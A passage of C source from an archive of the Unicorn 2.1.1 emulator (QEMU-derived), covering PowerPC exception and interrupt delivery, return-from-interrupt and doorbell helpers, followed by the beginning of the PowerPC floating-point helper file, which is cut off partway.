POWERPC_EXCP_FP: if ((msr_fe0 == 0 && msr_fe1 == 0) || msr_fp == 0) { LOG_EXCP("Ignore floating point exception\n"); cs->exception_index = POWERPC_EXCP_NONE; env->error_code = 0; return; } /* * FP exceptions always have NIP pointing to the faulting * instruction, so always use store_next and claim we are * precise in the MSR. */ msr |= 0x00100000; env->spr[SPR_BOOKE_ESR] = ESR_FP; break; case POWERPC_EXCP_INVAL: LOG_EXCP("Invalid instruction at " TARGET_FMT_lx "\n", env->nip); msr |= 0x00080000; env->spr[SPR_BOOKE_ESR] = ESR_PIL; break; case POWERPC_EXCP_PRIV: msr |= 0x00040000; env->spr[SPR_BOOKE_ESR] = ESR_PPR; break; case POWERPC_EXCP_TRAP: msr |= 0x00020000; env->spr[SPR_BOOKE_ESR] = ESR_PTR; break; default: /* Should never occur */ cpu_abort(cs, "Invalid program exception %d. Aborting\n", env->error_code); break; } break; case POWERPC_EXCP_SYSCALL: /* System call exception */ dump_syscall(env); lev = env->error_code; /* * We need to correct the NIP which in this case is supposed * to point to the next instruction */ env->nip += 4; #if 0 /* "PAPR mode" built-in hypercall emulation */ if ((lev == 1) && cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->hypercall(cpu->vhyp, cpu); return; } #endif if (lev == 1) { new_msr |= (target_ulong)MSR_HVB; } break; case POWERPC_EXCP_FPU: /* Floating-point unavailable exception */ case POWERPC_EXCP_APU: /* Auxiliary processor unavailable */ case POWERPC_EXCP_DECR: /* Decrementer exception */ break; case POWERPC_EXCP_FIT: /* Fixed-interval timer interrupt */ /* FIT on 4xx */ LOG_EXCP("FIT exception\n"); break; case POWERPC_EXCP_WDT: /* Watchdog timer interrupt */ LOG_EXCP("WDT exception\n"); switch (excp_model) { case POWERPC_EXCP_BOOKE: srr0 = SPR_BOOKE_CSRR0; srr1 = SPR_BOOKE_CSRR1; break; default: break; } break; case POWERPC_EXCP_DTLB: /* Data TLB error */ case POWERPC_EXCP_ITLB: /* Instruction TLB error */ break; case POWERPC_EXCP_DEBUG: /* Debug interrupt */ if (env->flags & POWERPC_FLAG_DE) { /* FIXME: choose one or the other based on CPU type */ srr0 = SPR_BOOKE_DSRR0; srr1 = SPR_BOOKE_DSRR1; asrr0 = SPR_BOOKE_CSRR0; asrr1 = SPR_BOOKE_CSRR1; /* DBSR already modified by caller */ } else { cpu_abort(cs, "Debug exception triggered on unsupported model\n"); } break; case POWERPC_EXCP_SPEU: /* SPE/embedded floating-point unavailable */ env->spr[SPR_BOOKE_ESR] = ESR_SPV; break; case POWERPC_EXCP_EFPDI: /* Embedded floating-point data interrupt */ /* XXX: TODO */ cpu_abort(cs, "Embedded floating point data exception " "is not implemented yet !\n"); env->spr[SPR_BOOKE_ESR] = ESR_SPV; break; case POWERPC_EXCP_EFPRI: /* Embedded floating-point round interrupt */ /* XXX: TODO */ cpu_abort(cs, "Embedded floating point round exception " "is not implemented yet !\n"); env->spr[SPR_BOOKE_ESR] = ESR_SPV; break; case POWERPC_EXCP_EPERFM: /* Embedded performance monitor interrupt */ /* XXX: TODO */ cpu_abort(cs, "Performance counter exception is not implemented yet !\n"); break; case POWERPC_EXCP_DOORI: /* Embedded doorbell interrupt */ break; case POWERPC_EXCP_DOORCI: /* Embedded doorbell critical interrupt */ srr0 = SPR_BOOKE_CSRR0; srr1 = SPR_BOOKE_CSRR1; break; case POWERPC_EXCP_RESET: /* System reset exception */ /* A power-saving exception sets ME, otherwise it is unchanged */ if (msr_pow) { /* indicate that we resumed from power save mode */ msr |= 0x10000; new_msr |= ((target_ulong)1 << MSR_ME); } if (env->msr_mask & MSR_HVB) { /* * ISA specifies HV, but can be delivered to guest with HV * clear (e.g., see FWNMI in PAPR, NMI injection in QEMU). */ new_msr |= (target_ulong)MSR_HVB; } else { if (msr_pow) { cpu_abort(cs, "Trying to deliver power-saving system reset " "exception %d with no HV support\n", excp); } } ail = 0; break; case POWERPC_EXCP_DSEG: /* Data segment exception */ case POWERPC_EXCP_ISEG: /* Instruction segment exception */ case POWERPC_EXCP_TRACE: /* Trace exception */ break; case POWERPC_EXCP_HDECR: /* Hypervisor decrementer exception */ case POWERPC_EXCP_HDSI: /* Hypervisor data storage exception */ case POWERPC_EXCP_HISI: /* Hypervisor instruction storage exception */ case POWERPC_EXCP_HDSEG: /* Hypervisor data segment exception */ case POWERPC_EXCP_HISEG: /* Hypervisor instruction segment exception */ case POWERPC_EXCP_SDOOR_HV: /* Hypervisor Doorbell interrupt */ case POWERPC_EXCP_HV_EMU: case POWERPC_EXCP_HVIRT: /* Hypervisor virtualization */ srr0 = SPR_HSRR0; srr1 = SPR_HSRR1; new_msr |= (target_ulong)MSR_HVB; new_msr |= env->msr & ((target_ulong)1 << MSR_RI); break; case POWERPC_EXCP_VPU: /* Vector unavailable exception */ case POWERPC_EXCP_VSXU: /* VSX unavailable exception */ case POWERPC_EXCP_FU: /* Facility unavailable exception */ #ifdef TARGET_PPC64 env->spr[SPR_FSCR] |= ((target_ulong)env->error_code << 56); #endif break; case POWERPC_EXCP_HV_FU: /* Hypervisor Facility Unavailable Exception */ #ifdef TARGET_PPC64 env->spr[SPR_HFSCR] |= ((target_ulong)env->error_code << FSCR_IC_POS); srr0 = SPR_HSRR0; srr1 = SPR_HSRR1; new_msr |= (target_ulong)MSR_HVB; new_msr |= env->msr & ((target_ulong)1 << MSR_RI); #endif break; case POWERPC_EXCP_PIT: /* Programmable interval timer interrupt */ LOG_EXCP("PIT exception\n"); break; case POWERPC_EXCP_IO: /* IO error exception */ /* XXX: TODO */ cpu_abort(cs, "601 IO error exception is not implemented yet !\n"); break; case POWERPC_EXCP_RUNM: /* Run mode exception */ /* XXX: TODO */ cpu_abort(cs, "601 run mode exception is not implemented yet !\n"); break; case POWERPC_EXCP_EMUL: /* Emulation trap exception */ /* XXX: TODO */ cpu_abort(cs, "602 emulation trap exception " "is not implemented yet !\n"); break; case POWERPC_EXCP_IFTLB: /* Instruction fetch TLB error */ switch (excp_model) { case POWERPC_EXCP_602: case POWERPC_EXCP_603: case POWERPC_EXCP_603E: case POWERPC_EXCP_G2: goto tlb_miss_tgpr; case POWERPC_EXCP_7x5: goto tlb_miss; case POWERPC_EXCP_74xx: goto tlb_miss_74xx; default: cpu_abort(cs, "Invalid instruction TLB miss exception\n"); break; } break; case POWERPC_EXCP_DLTLB: /* Data load TLB miss */ switch (excp_model) { case POWERPC_EXCP_602: case POWERPC_EXCP_603: case POWERPC_EXCP_603E: case POWERPC_EXCP_G2: goto tlb_miss_tgpr; case POWERPC_EXCP_7x5: goto tlb_miss; case POWERPC_EXCP_74xx: goto tlb_miss_74xx; default: cpu_abort(cs, "Invalid data load TLB miss exception\n"); break; } break; case POWERPC_EXCP_DSTLB: /* Data store TLB miss */ switch (excp_model) { case POWERPC_EXCP_602: case POWERPC_EXCP_603: case POWERPC_EXCP_603E: case POWERPC_EXCP_G2: tlb_miss_tgpr: /* Swap temporary saved registers with GPRs */ if (!(new_msr & ((target_ulong)1 << MSR_TGPR))) { new_msr |= (target_ulong)1 << MSR_TGPR; hreg_swap_gpr_tgpr(env); } goto tlb_miss; case POWERPC_EXCP_7x5: tlb_miss: #if defined(DEBUG_SOFTWARE_TLB) if (qemu_log_enabled()) { const char *es; target_ulong *miss, *cmp; int en; if (excp == POWERPC_EXCP_IFTLB) { es = "I"; en = 'I'; miss = &env->spr[SPR_IMISS]; cmp = &env->spr[SPR_ICMP]; } else { if (excp == POWERPC_EXCP_DLTLB) { es = "DL"; } else { es = "DS"; } en = 'D'; miss = &env->spr[SPR_DMISS]; cmp = &env->spr[SPR_DCMP]; } qemu_log("6xx %sTLB miss: %cM " TARGET_FMT_lx " %cC " TARGET_FMT_lx " H1 " TARGET_FMT_lx " H2 " TARGET_FMT_lx " %08x\n", es, en, *miss, en, *cmp, env->spr[SPR_HASH1], env->spr[SPR_HASH2], env->error_code); } #endif msr |= env->crf[0] << 28; msr |= env->error_code; /* key, D/I, S/L bits */ /* Set way using a LRU mechanism */ msr |= ((env->last_way + 1) & (env->nb_ways - 1)) << 17; break; case POWERPC_EXCP_74xx: tlb_miss_74xx: #if defined(DEBUG_SOFTWARE_TLB) if (qemu_log_enabled()) { const char *es; target_ulong *miss, *cmp; int en; if (excp == POWERPC_EXCP_IFTLB) { es = "I"; en = 'I'; miss = &env->spr[SPR_TLBMISS]; cmp = &env->spr[SPR_PTEHI]; } else { if (excp == POWERPC_EXCP_DLTLB) { es = "DL"; } else { es = "DS"; } en = 'D'; miss = &env->spr[SPR_TLBMISS]; cmp = &env->spr[SPR_PTEHI]; } qemu_log("74xx %sTLB miss: %cM " TARGET_FMT_lx " %cC " TARGET_FMT_lx " %08x\n", es, en, *miss, en, *cmp, env->error_code); } #endif msr |= env->error_code; /* key bit */ break; default: cpu_abort(cs, "Invalid data store TLB miss exception\n"); break; } break; case POWERPC_EXCP_FPA: /* Floating-point assist exception */ /* XXX: TODO */ cpu_abort(cs, "Floating point assist exception " "is not implemented yet !\n"); break; case POWERPC_EXCP_DABR: /* Data address breakpoint */ /* XXX: TODO */ cpu_abort(cs, "DABR exception is not implemented yet !\n"); break; case POWERPC_EXCP_IABR: /* Instruction address breakpoint */ /* XXX: TODO */ cpu_abort(cs, "IABR exception is not implemented yet !\n"); break; case POWERPC_EXCP_SMI: /* System management interrupt */ /* XXX: TODO */ cpu_abort(cs, "SMI exception is not implemented yet !\n"); break; case POWERPC_EXCP_THERM: /* Thermal interrupt */ /* XXX: TODO */ cpu_abort(cs, "Thermal management exception " "is not implemented yet !\n"); break; case POWERPC_EXCP_PERFM: /* Embedded performance monitor interrupt */ /* XXX: TODO */ cpu_abort(cs, "Performance counter exception is not implemented yet !\n"); break; case POWERPC_EXCP_VPUA: /* Vector assist exception */ /* XXX: TODO */ cpu_abort(cs, "VPU assist exception is not implemented yet !\n"); break; case POWERPC_EXCP_SOFTP: /* Soft patch exception */ /* XXX: TODO */ cpu_abort(cs, "970 soft-patch exception is not implemented yet !\n"); break; case POWERPC_EXCP_MAINT: /* Maintenance exception */ /* XXX: TODO */ cpu_abort(cs, "970 maintenance exception is not implemented yet !\n"); break; case POWERPC_EXCP_MEXTBR: /* Maskable external breakpoint */ /* XXX: TODO */ cpu_abort(cs, "Maskable external exception " "is not implemented yet !\n"); break; case POWERPC_EXCP_NMEXTBR: /* Non maskable external breakpoint */ /* XXX: TODO */ cpu_abort(cs, "Non maskable external exception " "is not implemented yet !\n"); break; default: excp_invalid: cpu_abort(cs, "Invalid PowerPC exception %d. Aborting\n", excp); break; } /* Save PC */ env->spr[srr0] = env->nip; /* Save MSR */ env->spr[srr1] = msr; /* Sanity check */ if (!(env->msr_mask & MSR_HVB)) { if (new_msr & MSR_HVB) { cpu_abort(cs, "Trying to deliver HV exception (MSR) %d with " "no HV support\n", excp); } if (srr0 == SPR_HSRR0) { cpu_abort(cs, "Trying to deliver HV exception (HSRR) %d with " "no HV support\n", excp); } } /* If any alternate SRR register are defined, duplicate saved values */ if (asrr0 != -1) { env->spr[asrr0] = env->spr[srr0]; } if (asrr1 != -1) { env->spr[asrr1] = env->spr[srr1]; } /* * Sort out endianness of interrupt, this differs depending on the * CPU, the HV mode, etc... */ #ifdef TARGET_PPC64 if (excp_model == POWERPC_EXCP_POWER7) { if (!(new_msr & MSR_HVB) && (env->spr[SPR_LPCR] & LPCR_ILE)) { new_msr |= (target_ulong)1 << MSR_LE; } } else if (excp_model == POWERPC_EXCP_POWER8) { if (new_msr & MSR_HVB) { if (env->spr[SPR_HID0] & HID0_HILE) { new_msr |= (target_ulong)1 << MSR_LE; } } else if (env->spr[SPR_LPCR] & LPCR_ILE) { new_msr |= (target_ulong)1 << MSR_LE; } } else if (excp_model == POWERPC_EXCP_POWER9) { if (new_msr & MSR_HVB) { if (env->spr[SPR_HID0] & HID0_POWER9_HILE) { new_msr |= (target_ulong)1 << MSR_LE; } } else if (env->spr[SPR_LPCR] & LPCR_ILE) { new_msr |= (target_ulong)1 << MSR_LE; } } else if (msr_ile) { new_msr |= (target_ulong)1 << MSR_LE; } #else if (msr_ile) { new_msr |= (target_ulong)1 << MSR_LE; } #endif /* Jump to handler */ vector = env->excp_vectors[excp]; #ifdef _MSC_VER if (vector == (target_ulong)(0ULL - 1ULL)) { #else if (vector == (target_ulong)-1ULL) { #endif cpu_abort(cs, "Raised an exception without defined vector %d\n", excp); } vector |= env->excp_prefix; /* * AIL only works if there is no HV transition and we are running * with translations enabled */ if (!((msr >> MSR_IR) & 1) || !((msr >> MSR_DR) & 1) || ((new_msr & MSR_HVB) && !(msr & MSR_HVB))) { ail = 0; } /* Handle AIL */ if (ail) { new_msr |= (1 << MSR_IR) | (1 << MSR_DR); vector |= ppc_excp_vector_offset(cs, ail); } #if defined(TARGET_PPC64) if (excp_model == POWERPC_EXCP_BOOKE) { if (env->spr[SPR_BOOKE_EPCR] & EPCR_ICM) { /* Cat.64-bit: EPCR.ICM is copied to MSR.CM */ new_msr |= (target_ulong)1 << MSR_CM; } else { vector = (uint32_t)vector; } } else { if (!msr_isf && !(env->mmu_model & POWERPC_MMU_64)) { vector = (uint32_t)vector; } else { new_msr |= (target_ulong)1 << MSR_SF; } } #endif powerpc_set_excp_state(cpu, vector, new_msr); } void ppc_cpu_do_interrupt(CPUState *cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; powerpc_excp(cpu, env->excp_model, cs->exception_index); } static void ppc_hw_interrupt(CPUPPCState *env) { PowerPCCPU *cpu = env_archcpu(env); bool async_deliver; /* External reset */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_RESET)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_RESET); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_RESET); return; } /* Machine check exception */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_MCK)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_MCK); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_MCHECK); return; } #if 0 /* TODO */ /* External debug exception */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_DEBUG)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_DEBUG); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_DEBUG); return; } #endif /* * For interrupts that gate on MSR:EE, we need to do something a * bit more subtle, as we need to let them through even when EE is * clear when coming out of some power management states (in order * for them to become a 0x100). */ async_deliver = (msr_ee != 0) || env->resume_as_sreset; /* Hypervisor decrementer exception */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_HDECR)) { /* LPCR will be clear when not supported so this will work */ bool hdice = !!(env->spr[SPR_LPCR] & LPCR_HDICE); if ((async_deliver || msr_hv == 0) && hdice) { /* HDEC clears on delivery */ env->pending_interrupts &= ~(1 << PPC_INTERRUPT_HDECR); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_HDECR); return; } } /* Hypervisor virtualization interrupt */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_HVIRT)) { /* LPCR will be clear when not supported so this will work */ bool hvice = !!(env->spr[SPR_LPCR] & LPCR_HVICE); if ((async_deliver || msr_hv == 0) && hvice) { powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_HVIRT); return; } } /* External interrupt can ignore MSR:EE under some circumstances */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_EXT)) { bool lpes0 = !!(env->spr[SPR_LPCR] & LPCR_LPES0); bool heic = !!(env->spr[SPR_LPCR] & LPCR_HEIC); /* HEIC blocks delivery to the hypervisor */ if ((async_deliver && !(heic && msr_hv && !msr_pr)) || (env->has_hv_mode && msr_hv == 0 && !lpes0)) { powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_EXTERNAL); return; } } if (msr_ce != 0) { /* External critical interrupt */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_CEXT)) { powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_CRITICAL); return; } } if (async_deliver != 0) { /* Watchdog timer on embedded PowerPC */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_WDT)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_WDT); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_WDT); return; } if (env->pending_interrupts & (1 << PPC_INTERRUPT_CDOORBELL)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_CDOORBELL); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_DOORCI); return; } /* Fixed interval timer on embedded PowerPC */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_FIT)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_FIT); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_FIT); return; } /* Programmable interval timer on embedded PowerPC */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_PIT)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_PIT); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_PIT); return; } /* Decrementer exception */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_DECR)) { if (ppc_decr_clear_on_delivery(env)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_DECR); } powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_DECR); return; } if (env->pending_interrupts & (1 << PPC_INTERRUPT_DOORBELL)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_DOORBELL); if (is_book3s_arch2x(env)) { powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_SDOOR); } else { powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_DOORI); } return; } if (env->pending_interrupts & (1 << PPC_INTERRUPT_HDOORBELL)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_HDOORBELL); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_SDOOR_HV); return; } if (env->pending_interrupts & (1 << PPC_INTERRUPT_PERFM)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_PERFM); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_PERFM); return; } /* Thermal interrupt */ if (env->pending_interrupts & (1 << PPC_INTERRUPT_THERM)) { env->pending_interrupts &= ~(1 << PPC_INTERRUPT_THERM); powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_THERM); return; } } if (env->resume_as_sreset) { /* * This is a bug ! It means that has_work took us out of halt without * anything to deliver while in a PM state that requires getting * out via a 0x100 * * This means we will incorrectly execute past the power management * instruction instead of triggering a reset. * * It generally means a discrepancy between the wakup conditions in the * processor has_work implementation and the logic in this function. */ cpu_abort(env_cpu(env), "Wakeup from PM state but interrupt Undelivered"); } } void ppc_cpu_do_system_reset(CPUState *cs, target_ulong vector) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; powerpc_excp(cpu, env->excp_model, POWERPC_EXCP_RESET); if (vector != -1) { env->nip = vector; } } void ppc_cpu_do_fwnmi_machine_check(CPUState *cs, target_ulong vector) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); target_ulong msr = 0; /* * Set MSR and NIP for the handler, SRR0/1, DAR and DSISR have already * been set by KVM. */ msr = (1ULL << MSR_ME); msr |= env->msr & (1ULL << MSR_SF); if (!(*pcc->interrupts_big_endian)(cpu)) { msr |= (1ULL << MSR_LE); } powerpc_set_excp_state(cpu, vector, msr); } bool ppc_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; if (interrupt_request & CPU_INTERRUPT_HARD) { ppc_hw_interrupt(env); if (env->pending_interrupts == 0) { cs->interrupt_request &= ~CPU_INTERRUPT_HARD; } return true; } return false; } #if defined(DEBUG_OP) static void cpu_dump_rfi(target_ulong RA, target_ulong msr) { qemu_log("Return from exception at " TARGET_FMT_lx " with flags " TARGET_FMT_lx "\n", RA, msr); } #endif /*****************************************************************************/ /* Exceptions processing helpers */ void raise_exception_err_ra(CPUPPCState *env, uint32_t exception, uint32_t error_code, uintptr_t raddr) { CPUState *cs = env_cpu(env); cs->exception_index = exception; env->error_code = error_code; cpu_loop_exit_restore(cs, raddr); } void raise_exception_err(CPUPPCState *env, uint32_t exception, uint32_t error_code) { raise_exception_err_ra(env, exception, error_code, 0); } void raise_exception(CPUPPCState *env, uint32_t exception) { raise_exception_err_ra(env, exception, 0, 0); } void raise_exception_ra(CPUPPCState *env, uint32_t exception, uintptr_t raddr) { raise_exception_err_ra(env, exception, 0, raddr); } void helper_raise_exception_err(CPUPPCState *env, uint32_t exception, uint32_t error_code) { raise_exception_err_ra(env, exception, error_code, 0); } void helper_raise_exception(CPUPPCState *env, uint32_t exception) { raise_exception_err_ra(env, exception, 0, 0); } void helper_store_msr(CPUPPCState *env, target_ulong val) { uint32_t excp = hreg_store_msr(env, val, 0); if (excp != 0) { CPUState *cs = env_cpu(env); cpu_interrupt_exittb(cs); raise_exception(env, excp); } } #if defined(TARGET_PPC64) #if defined(_MSC_VER) && defined(__clang__) void helper_pminsn(CPUPPCState *env, uint32_t insn) #else void helper_pminsn(CPUPPCState *env, uint32_t /*powerpc_pm_insn_t*/ insn) #endif { CPUState *cs; cs = env_cpu(env); cs->halted = 1; /* * The architecture specifies that HDEC interrupts are discarded * in PM states */ env->pending_interrupts &= ~(1 << PPC_INTERRUPT_HDECR); /* Condition for waking up at 0x100 */ env->resume_as_sreset = (insn != PPC_PM_STOP) || (env->spr[SPR_PSSCR] & PSSCR_EC); } #endif /* defined(TARGET_PPC64) */ static inline void do_rfi(CPUPPCState *env, target_ulong nip, target_ulong msr) { CPUState *cs = env_cpu(env); /* MSR:POW cannot be set by any form of rfi */ msr &= ~(1ULL << MSR_POW); #if defined(TARGET_PPC64) /* Switching to 32-bit ? Crop the nip */ if (!msr_is_64bit(env, msr)) { nip = (uint32_t)nip; } #else nip = (uint32_t)nip; #endif /* XXX: beware: this is false if VLE is supported */ env->nip = nip & ~((target_ulong)0x00000003); hreg_store_msr(env, msr, 1); #if defined(DEBUG_OP) cpu_dump_rfi(env->nip, env->msr); #endif /* * No need to raise an exception here, as rfi is always the last * insn of a TB */ cpu_interrupt_exittb(cs); /* Reset the reservation */ env->reserve_addr = -1; /* Context synchronizing: check if TCG TLB needs flush */ check_tlb_flush(env, false); } void helper_rfi(CPUPPCState *env) { do_rfi(env, env->spr[SPR_SRR0], env->spr[SPR_SRR1] & 0xfffffffful); } #define MSR_BOOK3S_MASK #if defined(TARGET_PPC64) void helper_rfid(CPUPPCState *env) { /* * The architeture defines a number of rules for which bits can * change but in practice, we handle this in hreg_store_msr() * which will be called by do_rfi(), so there is no need to filter * here */ do_rfi(env, env->spr[SPR_SRR0], env->spr[SPR_SRR1]); } void helper_hrfid(CPUPPCState *env) { do_rfi(env, env->spr[SPR_HSRR0], env->spr[SPR_HSRR1]); } #endif /*****************************************************************************/ /* Embedded PowerPC specific helpers */ void helper_40x_rfci(CPUPPCState *env) { do_rfi(env, env->spr[SPR_40x_SRR2], env->spr[SPR_40x_SRR3]); } void helper_rfci(CPUPPCState *env) { do_rfi(env, env->spr[SPR_BOOKE_CSRR0], env->spr[SPR_BOOKE_CSRR1]); } void helper_rfdi(CPUPPCState *env) { /* FIXME: choose CSRR1 or DSRR1 based on cpu type */ do_rfi(env, env->spr[SPR_BOOKE_DSRR0], env->spr[SPR_BOOKE_DSRR1]); } void helper_rfmci(CPUPPCState *env) { /* FIXME: choose CSRR1 or MCSRR1 based on cpu type */ do_rfi(env, env->spr[SPR_BOOKE_MCSRR0], env->spr[SPR_BOOKE_MCSRR1]); } void helper_tw(CPUPPCState *env, target_ulong arg1, target_ulong arg2, uint32_t flags) { if (!likely(!(((int32_t)arg1 < (int32_t)arg2 && (flags & 0x10)) || ((int32_t)arg1 > (int32_t)arg2 && (flags & 0x08)) || ((int32_t)arg1 == (int32_t)arg2 && (flags & 0x04)) || ((uint32_t)arg1 < (uint32_t)arg2 && (flags & 0x02)) || ((uint32_t)arg1 > (uint32_t)arg2 && (flags & 0x01))))) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_TRAP, GETPC()); } } #if defined(TARGET_PPC64) void helper_td(CPUPPCState *env, target_ulong arg1, target_ulong arg2, uint32_t flags) { if (!likely(!(((int64_t)arg1 < (int64_t)arg2 && (flags & 0x10)) || ((int64_t)arg1 > (int64_t)arg2 && (flags & 0x08)) || ((int64_t)arg1 == (int64_t)arg2 && (flags & 0x04)) || ((uint64_t)arg1 < (uint64_t)arg2 && (flags & 0x02)) || ((uint64_t)arg1 > (uint64_t)arg2 && (flags & 0x01))))) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_TRAP, GETPC()); } } #endif /*****************************************************************************/ /* PowerPC 601 specific instructions (POWER bridge) */ void helper_rfsvc(CPUPPCState *env) { do_rfi(env, env->lr, env->ctr & 0x0000FFFF); } /* Embedded.Processor Control */ static int dbell2irq(target_ulong rb) { int msg = rb & DBELL_TYPE_MASK; int irq = -1; switch (msg) { case DBELL_TYPE_DBELL: irq = PPC_INTERRUPT_DOORBELL; break; case DBELL_TYPE_DBELL_CRIT: irq = PPC_INTERRUPT_CDOORBELL; break; case DBELL_TYPE_G_DBELL: case DBELL_TYPE_G_DBELL_CRIT: case DBELL_TYPE_G_DBELL_MC: /* XXX implement */ default: break; } return irq; } void helper_msgclr(CPUPPCState *env, target_ulong rb) { int irq = dbell2irq(rb); if (irq < 0) { return; } env->pending_interrupts &= ~(1 << irq); } void helper_msgsnd(CPUPPCState *env, target_ulong rb) { int irq = dbell2irq(rb); int pir = rb & DBELL_PIRTAG_MASK; CPUState *cs = (CPUState *)env; PowerPCCPU *cpu = POWERPC_CPU(env->uc->cpu); CPUPPCState *cenv = &cpu->env; if (irq < 0) { return; } if ((rb & DBELL_BRDCAST) || (cenv->spr[SPR_BOOKE_PIR] == pir)) { cenv->pending_interrupts |= 1 << irq; cpu_interrupt(cs, CPU_INTERRUPT_HARD); } } /* Server Processor Control */ static bool dbell_type_server(target_ulong rb) { /* * A Directed Hypervisor Doorbell message is sent only if the * message type is 5. All other types are reserved and the * instruction is a no-op */ return (rb & DBELL_TYPE_MASK) == DBELL_TYPE_DBELL_SERVER; } void helper_book3s_msgclr(CPUPPCState *env, target_ulong rb) { if (!dbell_type_server(rb)) { return; } env->pending_interrupts &= ~(1 << PPC_INTERRUPT_HDOORBELL); } static void book3s_msgsnd_common(CPUPPCState *env, int pir, int irq) { CPUState *cs = (CPUState *)env; PowerPCCPU *cpu = POWERPC_CPU(env->uc->cpu); CPUPPCState *cenv = &cpu->env; /* TODO: broadcast message to all threads of the same processor */ if (cenv->spr_cb[SPR_PIR].default_value == pir) { cenv->pending_interrupts |= 1 << irq; cpu_interrupt(cs, CPU_INTERRUPT_HARD); } } void helper_book3s_msgsnd(CPUPPCState *env, target_ulong rb) { int pir = rb & DBELL_PROCIDTAG_MASK; if (!dbell_type_server(rb)) { return; } book3s_msgsnd_common(env, pir, PPC_INTERRUPT_HDOORBELL); } #if defined(TARGET_PPC64) void helper_book3s_msgclrp(CPUPPCState *env, target_ulong rb) { helper_hfscr_facility_check(env, HFSCR_MSGP, "msgclrp", HFSCR_IC_MSGP); if (!dbell_type_server(rb)) { return; } env->pending_interrupts &= ~(1 << PPC_INTERRUPT_DOORBELL); } /* * sends a message to other threads that are on the same * multi-threaded processor */ void helper_book3s_msgsndp(CPUPPCState *env, target_ulong rb) { int pir = env->spr_cb[SPR_PIR].default_value; helper_hfscr_facility_check(env, HFSCR_MSGP, "msgsndp", HFSCR_IC_MSGP); if (!dbell_type_server(rb)) { return; } /* TODO: TCG supports only one thread */ book3s_msgsnd_common(env, pir, PPC_INTERRUPT_DOORBELL); } #endif void ppc_cpu_do_unaligned_access(CPUState *cs, vaddr vaddr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { CPUPPCState *env = cs->env_ptr; uint32_t insn; /* Restore state and reload the insn we executed, for filling in DSISR. */ cpu_restore_state(cs, retaddr, true); insn = cpu_ldl_code(env, env->nip); cs->exception_index = POWERPC_EXCP_ALIGN; env->error_code = insn & 0x03FF0000; cpu_loop_exit(cs); } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/fpu_helper.c����������������������������������������������������������0000664�0000000�0000000�00000423734�14675241067�0020535�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC floating point and SPE emulation helpers for QEMU. * * Copyright (c) 2003-2007 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "internal.h" #include "fpu/softfloat.h" static inline float128 float128_snan_to_qnan(float128 x) { float128 r; r.high = x.high | 0x0000800000000000; r.low = x.low; return r; } #define float64_snan_to_qnan(x) ((x) | 0x0008000000000000ULL) #define float32_snan_to_qnan(x) ((x) | 0x00400000) #define float16_snan_to_qnan(x) ((x) | 0x0200) static inline bool fp_exceptions_enabled(CPUPPCState *env) { return (env->msr & ((1U << 